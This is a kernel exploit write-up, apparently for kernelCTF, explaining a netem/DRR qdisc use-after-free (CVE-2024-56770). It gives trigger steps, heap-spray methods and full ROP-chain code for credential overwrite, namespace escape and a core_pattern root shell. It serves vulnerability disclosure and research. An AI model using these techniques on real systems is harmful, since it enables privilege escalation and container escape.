pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md
# Overview

In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children hold. In the case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc [1], the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc, so 'qlen' ends up indicating the wrong number of packets in the tfifo. Concretely, if a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased; when netem later dequeues the newly created SKBs from the child, 'qlen' in netem is not decreased again.

```c
static struct sk_buff *netem_dequeue(struct Qdisc *sch)
{
	struct netem_sched_data *q = qdisc_priv(sch);
	struct sk_buff *skb;

tfifo_dequeue:
	skb = __qdisc_dequeue_head(&sch->q);
	if (skb) {
		qdisc_qstats_backlog_dec(sch, skb);
deliver:
		qdisc_bstats_update(sch, skb);
		return skb;
	}
	skb = netem_peek(q);
	if (skb) {
		u64 time_to_send;
		u64 now = ktime_get_ns();

		/* if more time remaining? */
		time_to_send = netem_skb_cb(skb)->time_to_send;
		if (q->slot.slot_next && q->slot.slot_next < time_to_send)
			get_slot_next(q, now);

		if (time_to_send <= now && q->slot.slot_next <= now) {
			netem_erase_head(q, skb);
			sch->q.qlen--;
			qdisc_qstats_backlog_dec(sch, skb);
			skb->next = NULL;
			skb->prev = NULL;
			/* skb->dev shares skb->rbnode area,
			 * we need to restore its value.
			 */
			skb->dev = qdisc_dev(sch);

			if (q->slot.slot_next) {
				q->slot.packets_left--;
				q->slot.bytes_left -= qdisc_pkt_len(skb);
				if (q->slot.packets_left <= 0 ||
				    q->slot.bytes_left <= 0)
					get_slot_next(q, now);
			}

			if (q->qdisc) {
				unsigned int pkt_len = qdisc_pkt_len(skb);
				struct sk_buff *to_free = NULL;
				int err;

				err = qdisc_enqueue(skb, q->qdisc, &to_free); // [1]
				kfree_skb_list(to_free);
				if (err != NET_XMIT_SUCCESS &&
				    net_xmit_drop_count(err)) {
					qdisc_qstats_drop(sch);
					qdisc_tree_reduce_backlog(sch, 1,
								  pkt_len);
				}
				goto tfifo_dequeue;
			}
			goto deliver;
		}

		if (q->qdisc) {
			skb = q->qdisc->ops->dequeue(q->qdisc);
			if (skb)
				goto deliver;
		}

		qdisc_watchdog_schedule_ns(&q->watchdog,
					   max(time_to_send,
					       q->slot.slot_next));
	}

	if (q->qdisc) {
		skb = q->qdisc->ops->dequeue(q->qdisc);
		if (skb)
			goto deliver;
	}
	return NULL;
}
```

We can trigger the UAF as follows.

- Create a Qdisc DRR `1:`
- Create a Class DRR `1:1`

- Create a Qdisc DRR `2:` as a child of `1:1`
- Create a Class DRR `2:1`
- Create a Class DRR `2:2`

- Create a Qdisc NetEM `3:` as a child of `2:1`

- Create a Qdisc TBF `4:` as a child of `3:`

- Create a Qdisc NetEM `5:` as a child of `2:2`

- Send a packet to `2:1`
- Send a packet to `2:1`

- Delete the Class DRR `2:1`

- Send a packet to `2:2`

- Delete the Class DRR `1:1`

- Send a packet to trigger the UAF
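The steps above correspond roughly to the following `tc` commands. This is a hedged sketch: the interface name, the netem/tbf parameters, and the way packets are steered into classes `2:1`/`2:2` (filters or skb priorities, omitted here) are all assumptions.

```shell
# Hypothetical reproduction of the qdisc tree (run as root inside a user+net namespace; eth0 is an assumption)
tc qdisc add dev eth0 root handle 1: drr
tc class add dev eth0 parent 1: classid 1:1 drr
tc qdisc add dev eth0 parent 1:1 handle 2: drr
tc class add dev eth0 parent 2: classid 2:1 drr
tc class add dev eth0 parent 2: classid 2:2 drr
tc qdisc add dev eth0 parent 2:1 handle 3: netem delay 100ms
tc qdisc add dev eth0 parent 3: handle 4: tbf rate 50Mbit burst 1542 latency 50ms
tc qdisc add dev eth0 parent 2:2 handle 5: netem delay 100ms
# ... send two packets classified into 2:1, then:
tc class del dev eth0 classid 2:1
# ... send a packet classified into 2:2, then:
tc class del dev eth0 classid 1:1
# the next dequeue walks the stale DRR active list -> UAF
```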

# KASLR Bypass

We used a timing side-channel attack to leak the kernel base.

# RIP Control

RIP is controlled in `drr_dequeue()`.

```c
static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	struct sk_buff *skb;
	unsigned int len;

	if (list_empty(&q->active))
		goto out;
	while (1) {
		cl = list_first_entry(&q->active, struct drr_class, alist);
		skb = cl->qdisc->ops->peek(cl->qdisc); // [2]
		if (skb == NULL) {
			qdisc_warn_nonwc(__func__, cl->qdisc);
			goto out;
		}
```

When the DRR class is deleted, both `cl` and `cl->qdisc` are freed, but the stale `cl` pointer remains reachable through the scheduler's active list. We spray a fake qdisc into the freed `cl->qdisc` allocation, which gives control over RIP when `cl->qdisc->ops->peek` is called [2]. Setting the fake qdisc's `ops` to `drr_qdisc_ops` causes its `peek` implementation, `qdisc_peek_dequeued()` below, to be invoked.

```c
static inline struct sk_buff *qdisc_peek_dequeued(struct Qdisc *sch)
{
	struct sk_buff *skb = skb_peek(&sch->gso_skb);

	/* we can reuse ->gso_skb because peek isn't called for root qdiscs */
	if (!skb) {
		skb = sch->dequeue(sch); // [3]

		if (skb) {
			__skb_queue_head(&sch->gso_skb, skb);
			/* it's still part of the queue */
			qdisc_qstats_backlog_inc(sch, skb);
			sch->q.qlen++;
		}
	}

	return skb;
}
```

In `qdisc_peek_dequeued()`, if `sch->gso_skb` is empty, `sch->dequeue` is called [3]. Since `dequeue` sits at offset 0x8 in `struct Qdisc`, a stack pivot gadget can be stored at this offset of the fake qdisc to perform ROP.

We allocate the `user_key_payload` and `ctl_buf` objects into `kmalloc-512` for the fake Qdisc spray.

For the mitigation kernel, we use a multiq Qdisc to bypass the mitigations, allocating the multiq Qdisc into the freed `cl->qdisc`.

```c
static int multiq_init(struct Qdisc *sch, struct nlattr *opt,
		       struct netlink_ext_ack *extack)
{
	struct multiq_sched_data *q = qdisc_priv(sch);
	int i, err;

	q->queues = NULL;

	if (!opt)
		return -EINVAL;

	err = tcf_block_get(&q->block, &q->filter_list, sch, extack);
	if (err)
		return err;

	q->max_bands = qdisc_dev(sch)->num_tx_queues;

	q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL); // [4]
	if (!q->queues)
		return -ENOBUFS;
	for (i = 0; i < q->max_bands; i++)
		q->queues[i] = &noop_qdisc;

	return multiq_tune(sch, opt, extack);
}
```

When the multiq Qdisc is initialized, `q->queues` is allocated in `multiq_init()` [4]. The allocation size is `q->max_bands * sizeof(struct Qdisc *)`, and `q->max_bands` comes from the device's `num_tx_queues`, which is user-controllable, so an object of almost any size can be allocated. To bypass the mitigation, we allocate an object larger than `0x2000` bytes, which is served by the page allocator rather than a slab cache. We then delete the multiq Qdisc and reclaim the freed `q->queues` allocation with `ctl_buf` objects.

```c
static struct sk_buff *multiq_peek(struct Qdisc *sch)
{
	struct multiq_sched_data *q = qdisc_priv(sch);
	unsigned int curband = q->curband;
	struct Qdisc *qdisc;
	struct sk_buff *skb;
	int band;

	for (band = 0; band < q->bands; band++) {
		/* cycle through bands to ensure fairness */
		curband++;
		if (curband >= q->bands)
			curband = 0;

		/* Check that target subqueue is available before
		 * pulling an skb to avoid head-of-line blocking.
		 */
		if (!netif_xmit_stopped(
		    netdev_get_tx_queue(qdisc_dev(sch), curband))) {
			qdisc = q->queues[curband];
			skb = qdisc->ops->peek(qdisc); // [5]
			if (skb)
				return skb;
		}
	}
	return NULL;
}
```

Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`; it reads `q->queues[]` and calls `qdisc->ops->peek()` [5]. Using `ctl_buf`, we overwrite the `q->queues[]` entries with the address of the `cpu_entry_area`. As a result, `qdisc->ops` also points into the `cpu_entry_area`, and RIP can finally be controlled.

# Post-RIP

For the COS kernel, the ROP payload is stored in the fake `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RBP` points to `struct Qdisc + 0x80`, so a `mov rsp, rbp` gadget pivots the stack into the payload.

```c
void rop_chain(uint64_t *data)
{
	int i = 0;

	data[i++] = 0;					// enqueue
	data[i++] = kbase + MOV_RSP_RBP_POP_RBP_RET;	// dequeue

	data[i++] = 0;					// keylen
	data[i++] = kbase + DRR_QDISC_OPS;		// ops

	i += 12;

	data[i++] = 0;					// gso_skb.next

	// current = find_task_by_vpid(getpid())
	data[i++] = kbase + POP_RDI_RET;
	data[i++] = getpid();
	data[i++] = kbase + FIND_TASK_BY_VPID;

	// current += offsetof(struct task_struct, rcu_read_lock_nesting)
	data[i++] = kbase + POP_RSI_RET;
	data[i++] = RCU_READ_LOCK_NESTING_OFF;
	data[i++] = kbase + ADD_RAX_RSI_RET;

	// current->rcu_read_lock_nesting = 0 (bypass RCU-protected section)
	data[i++] = kbase + POP_RCX_RET;
	data[i++] = 0;
	data[i++] = kbase + MOV_RAX_RCX_RET;

	// Bypass "scheduling while atomic": set oops_in_progress = 1
	data[i++] = kbase + POP_RDI_RET;
	data[i++] = 1;
	data[i++] = kbase + POP_RSI_RET;
	data[i++] = kbase + OOPS_IN_PROGRESS;
	data[i++] = kbase + MOV_RSI_RDI_RET;

	// commit_creds(&init_cred)
	data[i++] = kbase + POP_RDI_RET;
	data[i++] = kbase + INIT_CRED;
	data[i++] = kbase + COMMIT_CREDS;

	// find_task_by_vpid(1)
	data[i++] = kbase + POP_RDI_RET;
	data[i++] = 1;
	data[i++] = kbase + FIND_TASK_BY_VPID;

	// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
	data[i++] = kbase + MOV_RDI_RAX_RET;
	data[i++] = kbase + POP_RSI_RET;
	data[i++] = kbase + INIT_NSPROXY;
	data[i++] = kbase + SWITCH_TASK_NAMESPACES;

	// return to userland
	data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
	data[i++] = 0;
	data[i++] = 0;
	data[i++] = _user_rip;
	data[i++] = _user_cs;
	data[i++] = _user_rflags;
	data[i++] = _user_sp;
	data[i++] = _user_ss;
}
```

For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows.

```c
// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area(void)
{
	if (fork())
		return;

	struct cpu_entry_area_payload payload = {};

	payload.regs[0] = kbase + QDISC_RESET;			// multiq->ops->peek
	payload.regs[1] = kbase + POP_POP_RET;
	payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET;	// multiq->ops->reset
	payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF;	// fake ops
	payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET;
	payload.regs[5] = kbase + CORE_PATTERN;
	payload.regs[6] = MMAP_ADDR;
	payload.regs[7] = strlen((char *)MMAP_ADDR);
	payload.regs[8] = 0;
	payload.regs[9] = kbase + COPY_FROM_USER;
	payload.regs[10] = kbase + MSLEEP;

	set_affinity(1);
	signal(SIGFPE, sig_handler);
	signal(SIGTRAP, sig_handler);
	signal(SIGSEGV, sig_handler);
	setsid();

	while (1) {
		write_cpu_entry_area(&payload);
		usleep(1000);
	}
}
```

When RIP is controlled, `qdisc_reset()` is called first.

```c
void qdisc_reset(struct Qdisc *qdisc)
{
	const struct Qdisc_ops *ops = qdisc->ops;

	trace_qdisc_reset(qdisc);

	if (ops->reset)
		ops->reset(qdisc); // [6]

	__skb_queue_purge(&qdisc->gso_skb);
	__skb_queue_purge(&qdisc->skb_bad_txq);

	qdisc->q.qlen = 0;
	qdisc->qstats.backlog = 0;
}
```

In `qdisc_reset()`, `ops->reset()` is called while the `RBX` register holds the address of the fake qdisc in the `cpu_entry_area` [6]. Pointing `ops->reset()` at a `push rbx ; pop rsp` style stack pivot gadget therefore lands the stack in the payload and starts the ROP chain. Finally, the `core_pattern` overwrite technique is used to gain a root shell.
---
- Requirements:
  - Capabilities: CAP_NET_ADMIN, CAP_NET_RAW
  - Kernel configuration: CONFIG_NET_SCHED, CONFIG_NET_SCH_NETEM
  - User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50612537e9ab (netem: fix classful handling)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f8d4bc455047cf3903cd6f85f49978987dbb3027 (net/sched: netem: account for backlog updates from child qdisc)
- Affected Version: v3.3 - v6.13-rc2
- Affected Component: net/sched
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged user namespaces
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-56770
- Description: In the Linux kernel, the following vulnerability has been resolved: net/sched: netem: account for backlog updates from child qdisc In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc, the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated. If 'qlen' reaches the configured sch->limit, the enqueue function stops working, even though the tfifo is not full. Reproduce the bug: Ensure that the sender machine has GSO enabled. Configure netem as root qdisc and tbf as its child on the outgoing interface of the machine as follows: $ tc qdisc add dev <oif> root handle 1: netem delay 100ms limit 100 $ tc qdisc add dev <oif> parent 1:0 tbf rate 50Mbit burst 1542 latency 50ms Send bulk TCP traffic out via this interface, e.g., by running an iPerf3 client on the machine. Check the qdisc statistics: $ tc -s qdisc show dev <oif> Statistics after 10s of iPerf3 TCP test before the fix (note that netem's backlog > limit, netem stopped accepting packets): qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 2767766 bytes 1848 pkt (dropped 652, overlimits 0 requeues 0) backlog 4294528236b 1155p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 2767766 bytes 1848 pkt (dropped 327, overlimits 7601 requeues 0) backlog 0b 0p requeues 0 Statistics after the fix: qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 37766372 bytes 24974 pkt (dropped 9, overlimits 0 requeues 0) backlog 0b 0p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 37766372 bytes 24974 pkt (dropped 327, overlimits 96017 requeues 0) backlog 0b 0p requeues 0 tbf segments the GSO SKBs (tbf_segment) and updates the netem's 'qlen'. The interface fully stops transferring packets and "locks". In this case, the child qdisc and tfifo are empty, but 'qlen' indicates the tfifo is at its limit and no more packets are accepted. This patch adds a counter for the entries in the tfifo. Netem's 'qlen' is only decreased when a packet is returned by its dequeue function, and not during enqueuing into the child qdisc. External updates to 'qlen' are thus accounted for and only the behavior of the backlog statistics changes. As in other qdiscs, 'qlen' then keeps track of how many packets are held in netem and all of its children. As before, sch->limit remains as the maximum number of packets in the tfifo. The same applies to netem's backlog statistics.
---
exploit:
	gcc -o exploit ./exploit.c -lkeyutils -static

prerequisites:
	sudo apt-get install libkeyutils-dev